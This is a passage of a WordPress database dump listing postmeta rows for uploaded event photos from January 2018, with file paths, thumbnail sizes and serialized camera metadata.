(816, 316, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-08.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-08-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-08-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1513962668\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"20\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(817, 317, '_wp_attached_file', '2018/01/rtc-sport-2560-12.jpg'),
(818, 317, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-12.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-12-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-12-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1513962453\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"30\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(819, 318, '_wp_attached_file', '2018/01/rtc-sport-2560-09.jpg'),
(820, 318, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-09.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-09-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-09-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1513874785\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"41\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(821, 319, '_wp_attached_file', '2018/01/rtc-sport-2560-07.jpg'),
(822, 319, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:628;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2018/01/rtc-sport-2560-07.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-07-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"rtc-sport-2560-07-400x255.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 7D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1513874028\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"52\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(823, 320, '_edit_last', '1'),
(824, 320, '_edit_lock', '1516522474:1'),
(855, 320, '_thumbnail_id', '303'),
(858, 332, '_wp_attached_file', '2018/01/audit-avt-2-2560-01.jpg'),
(859, 332, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:537;s:6:\"height\";i:400;s:4:\"file\";s:31:\"2018/01/audit-avt-2-2560-01.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-01-300x223.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-01-400x298.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(860, 333, '_wp_attached_file', '2018/01/audit-avt-2-2560-02.jpg'),
(861, 333, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:537;s:6:\"height\";i:400;s:4:\"file\";s:31:\"2018/01/audit-avt-2-2560-02.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-02-300x223.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-02-400x298.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(862, 334, '_wp_attached_file', '2018/01/audit-avt-2-2560-03.jpg'),
(863, 334, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:537;s:6:\"height\";i:400;s:4:\"file\";s:31:\"2018/01/audit-avt-2-2560-03.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-03-300x223.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-03-400x298.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(864, 335, '_wp_attached_file', '2018/01/audit-avt-2-2560-04.jpg'),
(865, 335, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:537;s:6:\"height\";i:400;s:4:\"file\";s:31:\"2018/01/audit-avt-2-2560-04.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-04-300x223.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-04-400x298.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(866, 336, '_wp_attached_file', '2018/01/audit-avt-2-2560-05.jpg'),
(867, 336, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:537;s:6:\"height\";i:400;s:4:\"file\";s:31:\"2018/01/audit-avt-2-2560-05.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-05-300x223.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-05-400x298.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(868, 337, '_wp_attached_file', '2018/01/audit-avt-2-2560-06.jpg'),
(869, 337, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:537;s:6:\"height\";i:400;s:4:\"file\";s:31:\"2018/01/audit-avt-2-2560-06.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-06-300x223.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-06-400x298.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(870, 338, '_wp_attached_file', '2018/01/audit-avt-2-2560-07.jpg'),
(871, 338, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:537;s:6:\"height\";i:400;s:4:\"file\";s:31:\"2018/01/audit-avt-2-2560-07.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-07-300x223.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-07-400x298.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(872, 339, '_wp_attached_file', '2018/01/audit-avt-2-2560-08.jpg'),
(873, 339, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:537;s:6:\"height\";i:400;s:4:\"file\";s:31:\"2018/01/audit-avt-2-2560-08.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-08-300x223.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-08-400x298.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(874, 340, '_wp_attached_file', '2018/01/audit-avt-2-2560-09.jpg'),
(875, 340, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:537;s:6:\"height\";i:400;s:4:\"file\";s:31:\"2018/01/audit-avt-2-2560-09.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-09-300x223.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-09-400x298.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(876, 341, '_wp_attached_file', '2018/01/audit-avt-2-2560-10.jpg'),
(877, 341, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:537;s:6:\"height\";i:400;s:4:\"file\";s:31:\"2018/01/audit-avt-2-2560-10.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-10-300x223.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"audit-avt-2-2560-10-400x298.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(878, 342, '_edit_last', '1'),
(879, 342, '_edit_lock', '1516522780:1'),
(882, 342, '_thumbnail_id', '332'),
(885, 344, '_wp_attached_file', '2018/01/make-merit-old-year-2560-01.jpg'),
(886, 344, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:584;s:6:\"height\";i:400;s:4:\"file\";s:39:\"2018/01/make-merit-old-year-2560-01.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-01-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-01-400x274.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(887, 345, '_wp_attached_file', '2018/01/make-merit-old-year-2560-02.jpg'),
(888, 345, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:584;s:6:\"height\";i:400;s:4:\"file\";s:39:\"2018/01/make-merit-old-year-2560-02.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-02-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-02-400x274.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(889, 346, '_wp_attached_file', '2018/01/make-merit-old-year-2560-03.jpg'),
(890, 346, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:584;s:6:\"height\";i:400;s:4:\"file\";s:39:\"2018/01/make-merit-old-year-2560-03.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-03-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-03-400x274.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(891, 347, '_wp_attached_file', '2018/01/make-merit-old-year-2560-04.jpg'),
(892, 347, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:584;s:6:\"height\";i:400;s:4:\"file\";s:39:\"2018/01/make-merit-old-year-2560-04.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-04-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-04-400x274.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(893, 348, '_wp_attached_file', '2018/01/make-merit-old-year-2560-05.jpg'),
(894, 348, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:584;s:6:\"height\";i:400;s:4:\"file\";s:39:\"2018/01/make-merit-old-year-2560-05.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-05-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-05-400x274.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(895, 349, '_wp_attached_file', '2018/01/make-merit-old-year-2560-06.jpg'),
(896, 349, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:584;s:6:\"height\";i:400;s:4:\"file\";s:39:\"2018/01/make-merit-old-year-2560-06.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-06-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"make-merit-old-year-2560-06-400x274.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(897, 350, '_wp_attached_file', '2018/01/make-merit-old-year-2560-07.jpg'),
